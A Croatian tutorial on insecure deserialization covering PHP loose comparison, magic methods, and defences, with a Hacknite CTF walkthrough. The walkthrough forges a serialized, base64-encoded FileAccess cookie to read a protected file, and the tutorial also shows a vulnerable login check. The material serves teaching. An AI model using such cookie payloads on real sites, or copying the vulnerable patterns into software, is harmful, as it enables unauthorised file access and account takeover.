Serijalizacija je proces pretvaranja složenijih tipova podataka u jednostavniji oblik. Svrha je pohraniti podatke u obliku u kojem se oni mogu zapisati u datoteku, slati mrežom ili pohraniti u bazu podataka. Primjeri formata u koji se pohranjuju podatci su binarni zapis, JSON (JavaScript Object Notation) i XML (Extensible Markup Language).
Deserijalizacija je obrnut proces. Iz sažetog zapisa podataka rekonstruira se objekt koji je nekad prije bio serijaliziran. Deserijaliziran objekt mora biti jednak originalnom, obuhvatiti sve njegove funkcionalnosti i mora moći obavljati sve interakcije s web stranicom kao i original.

Nesigurna deserijalizacija (eng. Insecure deserialization) javlja se na web stranicama koje deserijaliziraju podatke koje unose korisnici. U idealnom slučaju, nikad se ne bi trebao izravno deserijalizirati korisnički unos jer svaki korisnik može biti zlonamjeran i unijeti podatke koji će izazvati štetu. Usprkos tomu što stranice provode različite provjere nad unesenim podatcima, vrlo je teško pokriti sve moguće slučajeve. Osim toga, često web stranica mora barem početi deserijalizaciju podataka prije nego što prepozna da je uneseno nešto maliciozno, a tad već može biti prekasno. Dodatan je problem što moderne stranice, kako bi imale što više funkcionalnosti, implementiraju velik broj biblioteka. Zbog toga već samo na razini jedne web stranice postoji velik broj klasa i metoda. Ne može se uvijek predvidjeti koja će se od tih brojnih metoda pozvati nad deserijaliziranim podatcima jer oni mogu biti različitih klasa, što znači da ne možemo predvidjeti ponašanje web stranice ako krene deserijalizirati nesigurne podatke. Zato su i posljedice vrlo širokog spektra. Napadač može dobiti mogućnost remote code executiona, a u slučaju da stranica ima dobru zaštitu protiv toga, i dalje može doći do eskalacije privilegija, pristupa nasumičnim datotekama i DoS (Denial-of-Service) napada.

Jedna od ranjivosti PHP-a koja se koristi pri deserijalizaciji je činjenica da postoji operator “==” koji je manje strog od klasičnog operatora jednakosti “===”. Pokazat ćemo razliku na ovom primjeru:

5 === "5"  //vraća False
5 == "5"  //vraća True

Operator “===” uspoređuje vrijednosti lijeve i desne strane, ali i tipove podataka. Budući da je na lijevoj strani broj (integer), a na desnoj niz znakova (string), operator vraća False, iako su im vrijednosti iste. S druge strane, operator “==” uspoređuje samo vrijednosti lijeve i desne strane te zato vraća True. Ovakva razlika između dvaju operatora jednakosti postoji u još nekim programskim jezicima, primjerice u JavaScriptu. Međutim, ovdje je ta razlika izraženija. Naime, ove će dvije tvrdnje rezultirati istinom, iako intuitivno ne bi trebale:

5 == "5 i još nešto"
0 == "nešto"

Prva se tvrdnja donekle se može shvatiti istinom jer je barem početak desne strane jednak lijevoj strani. Međutim, druga je je semantički pogrešna i stvara veće sigurnosne probleme. Naime, PHP će ovdje niz znakova “nešto” tretirati kao broj 0 jer u nizu nema znamenki. Uzmimo web stranicu koja deserijalizira podatke i provjerava podatke ovim kôdom:

$login = unserialize($_COOKIE)
if ($login['password'] == $password) {
// uspjeh
}

Unesena lozinka korisnika gleda se tako što se deserijalizira sve što se nalazi u kolačiću iz toga izvuče atribut password. Recimo da je napadač unio broj 0. Ako lozinka korisnika kojemu provaljuje u račun (varijabla $password) ne sadrži brojeve, izjednačavanje unesene lozinke s njom će vratiti istinu, odnosno sustav će unesenu lozinku tretirati kao ispravnu, iako je zapravo možda potpuno različita od prave. Važno je napomenuti da ovo funkcionira samo zbog razloga što deserijalizacija čuva tip podatka. Da se lozinka gledala direktno iz polja za unos, broj 0 pretvorio bi se u niz znakova “0”, a tada bi usporedba bila neistinita.

U PHP-u i još nekim programskim jezicima postoje tzv. magične metode. To su metode koje se automatski pozivaju u određenim situacijama. Objektno orijentirani jezici (primjerice Java), u modeliranju rješenja problema koriste se objektima. Objekti se mogu stvarati i uništavati te svako stvaranje objekta potakne pozivanje metode - konstruktora. U Pythonu je to __init__, u PHP-u construct() itd. Konstruktor je, dakle, jedan od primjera magičnih metoda. Sâmo postojanje magičnih metoda ne predstavlja ranjivost, no problem je kad se one izravno koriste podatcima koje unose korisnici jer se pozivanje tih metoda ne može spriječiti. Još je veći problem kad postoje magične metode prilikom deserijalizacije podataka kao što je slučaj u PHP-u. Metoda unserialize() automatski poziva metodu __wakeup(). Dakle, čak i ako neki podatci neće proći deserijalizaciju (primjerice, ako metoda unserialize() prepozna grešku), i dalje je moguće da se pokrene poziv metode __wakeup() i da se napravi šteta.

U objektno orijentiranim jezicima objekt pripada nekoj klasi. Klasa se može shvatiti kao vrsta objekta, a objekt je instanca klase. Primjerice, drveće bi se moglo modelirati klasom, a svako drvo za sebe jednim objektom. Svako drvo ima grane, listove i deblo te svako može raditi iste stvari (stvarati grane, pupove listova, odbaciti listove, promijeniti boju lista…). Na isti način, svaka klasa u programskom jeziku ima definirane atribute i metode koje se mogu zvati nad objektima koji pripadaju toj klasi. Atributi su osobine objekta, ono što on posjeduje, a metode su akcije koje objekt može obaviti ili koje se mogu obaviti nad njime.
Napadač može manipulirati koje će klase biti objekt poslan na deserijalizaciju. Kažemo da je umetnut nasumičan objekt jer u pravilu u svakoj stranici postoji mnogo klasa objekata koje se koriste pa je teško predvidjeti koju će od njih napadač odabrati da bi izazvao grešku. Uobičajeno programski jezici imaju mehanizme prepoznavanja neočekivanih tipova podataka pa će slanje objekta neke druge klase obično izazvati grešku (error) ili iznimku (exception). Ipak, to ne mora uvijek biti dovoljna zaštita jer je moguće da je objekt već ušao u sustav.


PRIMJER: Zadatak s Hacknite platforme - Autentifikacija bez lozinke

Istražujući internet, Ana je otkrila inovativan način kako se prijaviti u sustav kao admin bez potrebnog 
korisničkog imena ili lozinke. Zadovoljna svojim otkrićem, spremila je vrlo zanimljivu informaciju na 
/usr/local/flag.txt, no za pristup toj informaciji potrebno je prijaviti se u sustav kao admin.

Flag je u formatu CTF2021[brojevi]

http://chal.platforma.hacknite.hr:10014

U prilogu se nalazi i php datoteka stranice. Važan dio kôda je:

if (!isset($_COOKIE["message"])) {
        $defaultFileAccess = new FileAccess();
        $defaultFileAccess->set_filename("/usr/local/default.txt");
        setcookie("message", base64_encode(serialize($defaultFileAccess)), 
        [ "path" => $_SERVER["REQUEST_URI"] ]);
}

Klasa FileAccess definirana je u istoj datoteci.
Vidimo da, ako nije postavljen message parametar kolačića, atribut filename varijable $defaultFileAccess postavlja se na vrijednost “/usr/local/default.txt”, a u message parametar ulazi taj objekt koji je serijaliziran i čija je vrijednost kodirana preko Base64. Ukratko, putanja do datoteke kojoj gost ima pristup (default.txt) zadaje se unutar nekog objekta koji se serijalizira i zatim kodira.
Pokušajmo poslati zahtjev za flagom i presresti ga koristeći Burp Suite. Otvorimo njegov ugrađeni preglednik te uključimo opciju Intercept. Zatim odaberimo “Flag” s navigacije na vrhu stranice.

Napišimo sad php skriptu s pomoću koje ćemo kodirati preko Base64. Za provjeru ćemo kodirati vrijednost “/usr/local/default.txt” jer znamo da je naš zahtjev usmjeren tamo. Skripta treba izgledati ovako:

<?php
class FileAccess {
        private $filename;
        function set_filename($filename){
                $this->filename=$filename;
        }
        function get_file(){
                return file_get_contents($this->filename);
        }
}
$defaultFileAccess = new FileAccess();
        $defaultFileAccess->set_filename("/usr/local/default.txt"); 
        //zasad ostavimo zadanu putanju radi provjere kako skripta radi
        echo base64_encode(serialize($defaultFileAccess));
?>

Implementacija klase FileAccess prepisana je iz datoteke koja je priložena zadatku.
Rezultat ove skripte identičan je onome što vidimo u message parametru našeg zahtjeva, dakle implementirali smo kodiranje na isti način kao i web stranica. Promijenimo sad parametar funkcije set_filename() u željenu putanju “/usr/local/flag.txt”. Dobili smo:

TzoxMDoiRmlsZUFjY2VzcyI6MTp7czoyMDoiAEZpbGVBY2Nlc3MAZmlsZW5hbWUiO3M6MTk6Ii91c3IvbG9jYWwvZmxhZy50eHQiO30

To ćemo unijeti u message parametar i proslijediti zahtjev. Na stranici se pojavio flag.
Savjet: Za izvođenje jednostavnijih programa mogu se koristiti i online prevoditelji, primjerice https://www.programiz.com/php/online-compiler/.

Za sigurniju deserijalizaciju preporučljivo je koristiti se formatima koji imaju dobro definirana pravila deserijaliziranja, primjerice JSON ili XML. Na taj se način smanjuje vjerojatnost da će netko unijeti neku dodatnu logiku prilikom deserijalizacije jer je već mnogo toga jasno definirano.
Poželjno je složiti aplikaciju tako da ona pri serijalizaciji označi svaki podatak nekom vrstom potpisa. Zatim prije deserijalizacije treba provjeriti postoji li taj potpis te, ako ga nema, odbaciti podatak jer je vjerojatno maliciozan. Tako se može spriječiti ubacivanje štetnih podataka od strane napadača.
Neki jezici implementiraju zaštitu podataka koji se serijaliziraju. Primjerice, u Javi postoji sučelje Serializable koje mora implementirati svaka klasa objekata ako se oni serijaliziraju. Ako postoje podatci koji se ne smiju serijalizirati, njih treba označiti kao private transient. Private znači da se taj podatak ne bi trebao vidjeti niti u jednoj klasi izvan one u kojoj je definiran. Transient je ono što zapravo sprečava serijalizaciju podatka.
Postoje mnogi alati i biblioteke čija je zadaća osigurati deserijalizaciju, primjerice Javini SerialKiller i NotSoSerial te Serial Whitelist Application Trainer (SWAT) i mnogi drugi.

[1]https://www.baeldung.com/cs/serialization-deserialization
[2]https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html
[3]https://portswigger.net/web-security/deserialization
[4]https://portswigger.net/web-security/deserialization/exploiting
[5]https://platforma.hacknite.hr/